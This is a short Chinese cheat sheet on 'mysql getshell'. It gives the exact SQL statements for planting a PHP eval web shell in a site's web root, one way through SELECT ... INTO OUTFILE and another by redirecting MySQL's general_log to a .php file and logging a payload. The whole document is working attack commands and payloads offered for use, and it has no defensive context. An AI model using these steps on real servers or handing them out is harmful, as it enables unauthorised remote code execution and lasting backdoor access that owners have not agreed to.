mysql getshell:
1、利用select '代码' into outfile '绝对路径'
select '<?php @eval($_GET["test"]);?>' INTO OUTFILE 'C:/phpstudy/PHPTutorial/WWW/shell.php'
2、利用general_log:
general_log是mysql日志文件,可以记录mysql的所有操作。
相关操作:
show variables like 'general_log'; -- 查看日志是否开启
set global general_log=on; -- 开启日志功能
show variables like 'general_log_file'; -- 看看日志文件保存位置
set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置
show variables like 'log_output'; -- 看看日志输出类型 table或file
set global log_output='table'; -- 设置输出类型为 table
set global log_output='file'; -- 设置输出类型为file
写入shell:
set global general_log=on;//开启日志记录
SET global general_log_file='C:/phpstudy_pro/WWW/wordpress/test.php';//将日志产生的默认路径改成php文件。
SELECT '<?php eval($_POST["test"]);?>'; //日志中插入代码,之后访问上面的test.php即可getshell
